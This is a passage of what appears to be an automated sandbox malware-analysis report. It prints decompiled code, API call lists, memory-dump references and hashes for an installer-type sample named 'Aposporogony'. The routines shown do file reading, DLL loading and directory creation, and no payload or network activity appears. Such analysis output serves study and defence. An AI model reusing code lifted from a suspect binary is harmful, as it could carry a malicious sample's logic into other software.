                                                                                                                                                                                      0x004054c7
                                                                                                                                                                                      0x004054d0
                                                                                                                                                                                      0x004054dc
                                                                                                                                                                                      0x004054e3
                                                                                                                                                                                      0x004054e7
                                                                                                                                                                                      0x004054ea
                                                                                                                                                                                      0x004054fd
                                                                                                                                                                                      0x0040550b
                                                                                                                                                                                      0x0040550b
                                                                                                                                                                                      0x0040550f
                                                                                                                                                                                      0x00405511
                                                                                                                                                                                      0x00405514
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00405514
                                                                                                                                                                                      0x00405495
                                                                                                                                                                                      0x0040549d
                                                                                                                                                                                      0x004054a5
                                                                                                                                                                                      0x004054ab
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004054ab
                                                                                                                                                                                      0x004054a5
                                                                                                                                                                                      0x00405493
                                                                                                                                                                                      0x00405520

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsm2525.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                                                                                                      • lstrlenW.KERNEL32(00402F08,Skipped: C:\Users\user\AppData\Local\Temp\nsm2525.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                                                                                                      • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsm2525.tmp\System.dll,00402F08), ref: 004054AB
                                                                                                                                                                                      • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsm2525.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsm2525.tmp\System.dll), ref: 004054BD
                                                                                                                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                                                                                                      • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                                                                                                      • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2038348795.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2038317918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038409916.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038452317.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038631051.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038667231.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038701322.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038736487.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038809047.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038840995.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038879039.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038911972.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038945906.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039260955.00000000004A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039305161.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039403642.00000000004BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                                                                      • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsm2525.tmp\System.dll
                                                                                                                                                                                      • API String ID: 2531174081-527347480
                                                                                                                                                                                      • Opcode ID: d8bd542d8f5d0add287beae510a16995646733a1dc03fc5179ed0d48c47eb8dc
                                                                                                                                                                                      • Instruction ID: e73fa1987b6059f35b704de59c80f6892b54c3d1ee51518932a2041d94d0b0cb
                                                                                                                                                                                      • Opcode Fuzzy Hash: d8bd542d8f5d0add287beae510a16995646733a1dc03fc5179ed0d48c47eb8dc
                                                                                                                                                                                      • Instruction Fuzzy Hash: BE21A171900558BACB119F95DD84ACFBFB5EF84314F10803AF904B22A1C3798A91CFA8
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 860 40264a-402663 call 402c1f 863 402ac5-402ac8 860->863 864 402669-402670 860->864 865 402ace-402ad4 863->865 866 402672 864->866 867 402675-402678 864->867 866->867 868 4027dc-4027e4 867->868 869 40267e-40268d call 406348 867->869 868->863 869->868 873 402693 869->873 874 402699-40269d 873->874 875 402732-402735 874->875 876 4026a3-4026be ReadFile 874->876 878 402737-40273a 875->878 879 40274d-40275d call 405f61 875->879 876->868 877 4026c4-4026c9 876->877 877->868 882 4026cf-4026dd 877->882 878->879 880 40273c-402747 call 405fbf 878->880 879->868 888 40275f 879->888 880->868 880->879 885 4026e3-4026f5 MultiByteToWideChar 882->885 886 402798-4027a4 call 40632f 882->886 885->888 889 4026f7-4026fa 885->889 886->865 891 402762-402765 888->891 892 4026fc-402707 889->892 891->886 894 402767-40276c 891->894 892->891 895 402709-40272e SetFilePointer MultiByteToWideChar 892->895 896 4027a9-4027ad 894->896 897 40276e-402773 894->897 895->892 898 402730 895->898 899 4027ca-4027d6 SetFilePointer 896->899 900 4027af-4027b3 896->900 897->896 901 402775-402788 897->901 898->888 899->868 902 4027b5-4027b9 900->902 903 4027bb-4027c8 900->903 901->868 904 40278a-402790 901->904 902->899 902->903 903->868 904->874 905 402796 904->905 905->868
                                                                                                                                                                                      C-Code - Quality: 87%
                                                                                                                                                                                      			E0040264A(intOrPtr __ebx, intOrPtr __edx, void* __esi) {
                                                                                                                                                                                      				intOrPtr _t65;
                                                                                                                                                                                      				intOrPtr _t66;
                                                                                                                                                                                      				intOrPtr _t72;
                                                                                                                                                                                      				void* _t76;
                                                                                                                                                                                      				void* _t79;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t72 = __edx;
                                                                                                                                                                                      				 *((intOrPtr*)(_t76 - 8)) = __ebx;
                                                                                                                                                                                      				_t65 = 2;
                                                                                                                                                                                      				 *((intOrPtr*)(_t76 - 0x48)) = _t65;
                                                                                                                                                                                      				_t66 = E00402C1F(_t65);
                                                                                                                                                                                      				_t79 = _t66 - 1;
                                                                                                                                                                                      				 *((intOrPtr*)(_t76 - 0x4c)) = _t72;
                                                                                                                                                                                      				 *((intOrPtr*)(_t76 - 0x3c)) = _t66;
                                                                                                                                                                                      				if(_t79 < 0) {
                                                                                                                                                                                      					L36:
                                                                                                                                                                                      					 *0x42a2e8 =  *0x42a2e8 +  *(_t76 - 4);
                                                                                                                                                                                      				} else {
                                                                                                                                                                                      					__ecx = 0x3ff;
                                                                                                                                                                                      					if(__eax > 0x3ff) {
                                                                                                                                                                                      						 *(__ebp - 0x3c) = 0x3ff;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					if( *__esi == __bx) {
                                                                                                                                                                                      						L34:
                                                                                                                                                                                      						__ecx =  *(__ebp - 0xc);
                                                                                                                                                                                      						__eax =  *(__ebp - 8);
                                                                                                                                                                                      						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
                                                                                                                                                                                      						if(_t79 == 0) {
                                                                                                                                                                                      							 *(_t76 - 4) = 1;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						goto L36;
                                                                                                                                                                                      					} else {
                                                                                                                                                                                      						 *(__ebp - 0x30) = __ebx;
                                                                                                                                                                                      						 *(__ebp - 0x10) = E00406348(__ecx, __esi);
                                                                                                                                                                                      						if( *(__ebp - 0x3c) > __ebx) {
                                                                                                                                                                                      							do {
                                                                                                                                                                                      								if( *((intOrPtr*)(__ebp - 0x2c)) != 0x39) {
                                                                                                                                                                                      									if( *((intOrPtr*)(__ebp - 0x1c)) != __ebx ||  *(__ebp - 8) != __ebx || E00405FBF( *(__ebp - 0x10), __ebx) >= 0) {
                                                                                                                                                                                      										__eax = __ebp - 0x44;
                                                                                                                                                                                      										if(E00405F61( *(__ebp - 0x10), __ebp - 0x44, 2) == 0) {
                                                                                                                                                                                      											goto L34;
                                                                                                                                                                                      										} else {
                                                                                                                                                                                      											goto L21;
                                                                                                                                                                                      										}
                                                                                                                                                                                      									} else {
                                                                                                                                                                                      										goto L34;
                                                                                                                                                                                      									}
                                                                                                                                                                                      								} else {
                                                                                                                                                                                      									__eax = __ebp - 0x38;
                                                                                                                                                                                      									_push(__ebx);
                                                                                                                                                                                      									_push(__ebp - 0x38);
                                                                                                                                                                                      									__eax = 2;
                                                                                                                                                                                      									__ebp - 0x38 -  *((intOrPtr*)(__ebp - 0x1c)) = __ebp + 0xa;
                                                                                                                                                                                      									__eax = ReadFile( *(__ebp - 0x10), __ebp + 0xa, __ebp - 0x38 -  *((intOrPtr*)(__ebp - 0x1c)), ??, ??); // executed
                                                                                                                                                                                      									if(__eax == 0) {
                                                                                                                                                                                      										goto L34;
                                                                                                                                                                                      									} else {
                                                                                                                                                                                      										__ecx =  *(__ebp - 0x38);
                                                                                                                                                                                      										if(__ecx == __ebx) {
                                                                                                                                                                                      											goto L34;
                                                                                                                                                                                      										} else {
                                                                                                                                                                                      											__ax =  *(__ebp + 0xa) & 0x000000ff;
                                                                                                                                                                                      											 *(__ebp - 0x48) = __ecx;
                                                                                                                                                                                      											 *(__ebp - 0x44) = __eax;
                                                                                                                                                                                      											if( *((intOrPtr*)(__ebp - 0x1c)) != __ebx) {
                                                                                                                                                                                      												L28:
                                                                                                                                                                                      												__ax & 0x0000ffff = E0040632F( *(__ebp - 0xc), __ax & 0x0000ffff);
                                                                                                                                                                                      											} else {
                                                                                                                                                                                      												__ebp - 0x44 = __ebp + 0xa;
                                                                                                                                                                                      												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x44, 1) != 0) {
                                                                                                                                                                                      													L21:
                                                                                                                                                                                      													__eax =  *(__ebp - 0x44);
                                                                                                                                                                                      												} else {
                                                                                                                                                                                      													__esi =  *(__ebp - 0x48);
                                                                                                                                                                                      													__esi =  ~( *(__ebp - 0x48));
                                                                                                                                                                                      													while(1) {
                                                                                                                                                                                      														_t22 = __ebp - 0x38;
                                                                                                                                                                                      														 *_t22 =  *(__ebp - 0x38) - 1;
                                                                                                                                                                                      														__eax = 0xfffd;
                                                                                                                                                                                      														 *(__ebp - 0x44) = 0xfffd;
                                                                                                                                                                                      														if( *_t22 == 0) {
                                                                                                                                                                                      															goto L22;
                                                                                                                                                                                      														}
                                                                                                                                                                                      														 *(__ebp - 0x48) =  *(__ebp - 0x48) - 1;
                                                                                                                                                                                      														__esi = __esi + 1;
                                                                                                                                                                                      														__eax = SetFilePointer( *(__ebp - 0x10), __esi, __ebx, 1); // executed
                                                                                                                                                                                      														__ebp - 0x44 = __ebp + 0xa;
                                                                                                                                                                                      														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x38), __ebp - 0x44, 1) == 0) {
                                                                                                                                                                                      															continue;
                                                                                                                                                                                      														} else {
                                                                                                                                                                                      															goto L21;
                                                                                                                                                                                      														}
                                                                                                                                                                                      														goto L22;
                                                                                                                                                                                      													}
                                                                                                                                                                                      												}
                                                                                                                                                                                      												L22:
                                                                                                                                                                                      												if( *((intOrPtr*)(__ebp - 0x1c)) != __ebx) {
                                                                                                                                                                                      													goto L28;
                                                                                                                                                                                      												} else {
                                                                                                                                                                                      													if( *(__ebp - 0x30) == 0xd ||  *(__ebp - 0x30) == 0xa) {
                                                                                                                                                                                      														if( *(__ebp - 0x30) == __ax || __ax != 0xd && __ax != 0xa) {
                                                                                                                                                                                      															 *(__ebp - 0x48) =  ~( *(__ebp - 0x48));
                                                                                                                                                                                      															__eax = SetFilePointer( *(__ebp - 0x10),  ~( *(__ebp - 0x48)), __ebx, 1);
                                                                                                                                                                                      														} else {
                                                                                                                                                                                      															__ecx =  *(__ebp - 0xc);
                                                                                                                                                                                      															__edx =  *(__ebp - 8);
                                                                                                                                                                                      															 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                                                                                                                                                                      															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                                                                                                                                                                                      														}
                                                                                                                                                                                      														goto L34;
                                                                                                                                                                                      													} else {
                                                                                                                                                                                      														__ecx =  *(__ebp - 0xc);
                                                                                                                                                                                      														__edx =  *(__ebp - 8);
                                                                                                                                                                                      														 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                                                                                                                                                                      														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                                                                                                                                                                                      														 *(__ebp - 0x30) = __eax;
                                                                                                                                                                                      														if(__ax == __bx) {
                                                                                                                                                                                      															goto L34;
                                                                                                                                                                                      														} else {
                                                                                                                                                                                      															goto L26;
                                                                                                                                                                                      														}
                                                                                                                                                                                      													}
                                                                                                                                                                                      												}
                                                                                                                                                                                      											}
                                                                                                                                                                                      										}
                                                                                                                                                                                      									}
                                                                                                                                                                                      								}
                                                                                                                                                                                      								goto L37;
                                                                                                                                                                                      								L26:
                                                                                                                                                                                      								__eax =  *(__ebp - 8);
                                                                                                                                                                                      							} while ( *(__ebp - 8) <  *(__ebp - 0x3c));
                                                                                                                                                                                      						}
                                                                                                                                                                                      						goto L34;
                                                                                                                                                                                      					}
                                                                                                                                                                                      				}
                                                                                                                                                                                      				L37:
                                                                                                                                                                                      				return 0;
                                                                                                                                                                                      			}








                                                                                                                                                                                      0x0040264a
                                                                                                                                                                                      0x0040264c
                                                                                                                                                                                      0x0040264f
                                                                                                                                                                                      0x00402651
                                                                                                                                                                                      0x00402654
                                                                                                                                                                                      0x00402659
                                                                                                                                                                                      0x0040265d
                                                                                                                                                                                      0x00402660
                                                                                                                                                                                      0x00402663
                                                                                                                                                                                      0x00402ac5
                                                                                                                                                                                      0x00402ac8
                                                                                                                                                                                      0x00402669
                                                                                                                                                                                      0x00402669
                                                                                                                                                                                      0x00402670
                                                                                                                                                                                      0x00402672
                                                                                                                                                                                      0x00402672
                                                                                                                                                                                      0x00402678
                                                                                                                                                                                      0x004027dc
                                                                                                                                                                                      0x004027dc
                                                                                                                                                                                      0x004027df
                                                                                                                                                                                      0x004027e4
                                                                                                                                                                                      0x004015b6
                                                                                                                                                                                      0x0040288b
                                                                                                                                                                                      0x0040288b
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0040267e
                                                                                                                                                                                      0x0040267f
                                                                                                                                                                                      0x0040268a
                                                                                                                                                                                      0x0040268d
                                                                                                                                                                                      0x00402699
                                                                                                                                                                                      0x0040269d
                                                                                                                                                                                      0x00402735
                                                                                                                                                                                      0x0040274d
                                                                                                                                                                                      0x0040275d
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004026a3
                                                                                                                                                                                      0x004026a3
                                                                                                                                                                                      0x004026a6
                                                                                                                                                                                      0x004026a7
                                                                                                                                                                                      0x004026aa
                                                                                                                                                                                      0x004026af
                                                                                                                                                                                      0x004026b6
                                                                                                                                                                                      0x004026be
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004026c4
                                                                                                                                                                                      0x004026c4
                                                                                                                                                                                      0x004026c9
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004026cf
                                                                                                                                                                                      0x004026cf
                                                                                                                                                                                      0x004026d7
                                                                                                                                                                                      0x004026da
                                                                                                                                                                                      0x004026dd
                                                                                                                                                                                      0x00402798
                                                                                                                                                                                      0x0040279f
                                                                                                                                                                                      0x004026e3
                                                                                                                                                                                      0x004026e9
                                                                                                                                                                                      0x004026f5
                                                                                                                                                                                      0x0040275f
                                                                                                                                                                                      0x0040275f
                                                                                                                                                                                      0x004026f7
                                                                                                                                                                                      0x004026f7
                                                                                                                                                                                      0x004026fa
                                                                                                                                                                                      0x004026fc
                                                                                                                                                                                      0x004026fc
                                                                                                                                                                                      0x004026fc
                                                                                                                                                                                      0x004026ff
                                                                                                                                                                                      0x00402704
                                                                                                                                                                                      0x00402707
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00402709
                                                                                                                                                                                      0x0040270c
                                                                                                                                                                                      0x00402714
                                                                                                                                                                                      0x00402720
                                                                                                                                                                                      0x0040272e
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00402730
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00402730
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0040272e
                                                                                                                                                                                      0x004026fc
                                                                                                                                                                                      0x00402762
                                                                                                                                                                                      0x00402765
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00402767
                                                                                                                                                                                      0x0040276c
                                                                                                                                                                                      0x004027ad
                                                                                                                                                                                      0x004027cf
                                                                                                                                                                                      0x004027d6
                                                                                                                                                                                      0x004027bb
                                                                                                                                                                                      0x004027bb
                                                                                                                                                                                      0x004027be
                                                                                                                                                                                      0x004027c1
                                                                                                                                                                                      0x004027c4
                                                                                                                                                                                      0x004027c4
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00402775
                                                                                                                                                                                      0x00402775
                                                                                                                                                                                      0x00402778
                                                                                                                                                                                      0x0040277b
                                                                                                                                                                                      0x00402781
                                                                                                                                                                                      0x00402785
                                                                                                                                                                                      0x00402788
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00402788
                                                                                                                                                                                      0x0040276c
                                                                                                                                                                                      0x00402765
                                                                                                                                                                                      0x004026dd
                                                                                                                                                                                      0x004026c9
                                                                                                                                                                                      0x004026be
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0040278a
                                                                                                                                                                                      0x0040278a
                                                                                                                                                                                      0x0040278d
                                                                                                                                                                                      0x00402796
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0040268d
                                                                                                                                                                                      0x00402678
                                                                                                                                                                                      0x00402ace
                                                                                                                                                                                      0x00402ad4

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • ReadFile.KERNELBASE(?,?,?,?), ref: 004026B6
                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026F1
                                                                                                                                                                                      • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402714
                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040272A
                                                                                                                                                                                        • Part of subcall function 00405FBF: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405FD5
                                                                                                                                                                                      • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D6
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2038348795.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2038317918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038409916.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038452317.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038631051.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038667231.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038701322.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038736487.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038809047.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038840995.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038879039.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038911972.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038945906.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039260955.00000000004A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039305161.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039403642.00000000004BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                                                                                      • String ID: 9
                                                                                                                                                                                      • API String ID: 163830602-2366072709
                                                                                                                                                                                      • Opcode ID: cadc99d36448674c458fec809f66667da68abd58cfb7d9264b13fa75ded684dc
                                                                                                                                                                                      • Instruction ID: add249696b334c0fceafe0529c612de3b1c59f5eaafd60b3ba6c21ea99dd66a9
                                                                                                                                                                                      • Opcode Fuzzy Hash: cadc99d36448674c458fec809f66667da68abd58cfb7d9264b13fa75ded684dc
                                                                                                                                                                                      • Instruction Fuzzy Hash: FD510A74D10219AEDF21DF95DA88AAEB779FF04304F50443BE901B72D0D7B89982CB59
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 906 406752-406772 GetSystemDirectoryW 907 406774 906->907 908 406776-406778 906->908 907->908 909 406789-40678b 908->909 910 40677a-406783 908->910 912 40678c-4067bf wsprintfW LoadLibraryExW 909->912 910->909 911 406785-406787 910->911 911->912
                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                      			E00406752(intOrPtr _a4) {
                                                                                                                                                                                      				short _v576;
                                                                                                                                                                                      				signed int _t13;
                                                                                                                                                                                      				struct HINSTANCE__* _t17;
                                                                                                                                                                                      				signed int _t19;
                                                                                                                                                                                      				void* _t24;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t13 = GetSystemDirectoryW( &_v576, 0x104);
                                                                                                                                                                                      				if(_t13 > 0x104) {
                                                                                                                                                                                      					_t13 = 0;
                                                                                                                                                                                      				}
                                                                                                                                                                                      				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
                                                                                                                                                                                      					_t19 = 1;
                                                                                                                                                                                      				} else {
                                                                                                                                                                                      					_t19 = 0;
                                                                                                                                                                                      				}
                                                                                                                                                                                      				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
                                                                                                                                                                                      				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
                                                                                                                                                                                      				return _t17;
                                                                                                                                                                                      			}








                                                                                                                                                                                      0x00406769
                                                                                                                                                                                      0x00406772
                                                                                                                                                                                      0x00406774
                                                                                                                                                                                      0x00406774
                                                                                                                                                                                      0x00406778
                                                                                                                                                                                      0x0040678b
                                                                                                                                                                                      0x00406785
                                                                                                                                                                                      0x00406785
                                                                                                                                                                                      0x00406785
                                                                                                                                                                                      0x004067a4
                                                                                                                                                                                      0x004067b8
                                                                                                                                                                                      0x004067bf

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
                                                                                                                                                                                      • wsprintfW.USER32 ref: 004067A4
                                                                                                                                                                                      • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004067B8
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2038348795.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2038317918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038409916.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038452317.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038631051.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038667231.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038701322.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038736487.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038809047.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038840995.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038879039.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038911972.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038945906.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039260955.00000000004A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039305161.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039403642.00000000004BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                                                                      • String ID: %s%S.dll$UXTHEME$\
                                                                                                                                                                                      • API String ID: 2200240437-1946221925
                                                                                                                                                                                      • Opcode ID: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                                                                                                                                                      • Instruction ID: 07f60acf873a648e61080255fd3e200204736070213a9ab7c1209ab7057fe03e
                                                                                                                                                                                      • Opcode Fuzzy Hash: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                                                                                                                                                      • Instruction Fuzzy Hash: 27F0FC70540219AECB10AB68ED0DFAB366CA700304F10447AA64AF20D1EB789A24C798
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 913 40591f-40596a CreateDirectoryW 914 405970-40597d GetLastError 913->914 915 40596c-40596e 913->915 916 405997-405999 914->916 917 40597f-405993 SetFileSecurityW 914->917 915->916 917->915 918 405995 GetLastError 917->918 918->916
                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                      			E0040591F(WCHAR* _a4) {
                                                                                                                                                                                      				struct _SECURITY_ATTRIBUTES _v16;
                                                                                                                                                                                      				struct _SECURITY_DESCRIPTOR _v36;
                                                                                                                                                                                      				int _t22;
                                                                                                                                                                                      				long _t23;
                                                                                                                                                                                      
                                                                                                                                                                                      				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
                                                                                                                                                                                      				_v36.Owner = 0x4083f0;
                                                                                                                                                                                      				_v36.Group = 0x4083f0;
                                                                                                                                                                                      				_v36.Sacl = _v36.Sacl & 0x00000000;
                                                                                                                                                                                      				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
                                                                                                                                                                                      				_v16.lpSecurityDescriptor =  &_v36;
                                                                                                                                                                                      				_v36.Revision = 1;
                                                                                                                                                                                      				_v36.Control = 4;
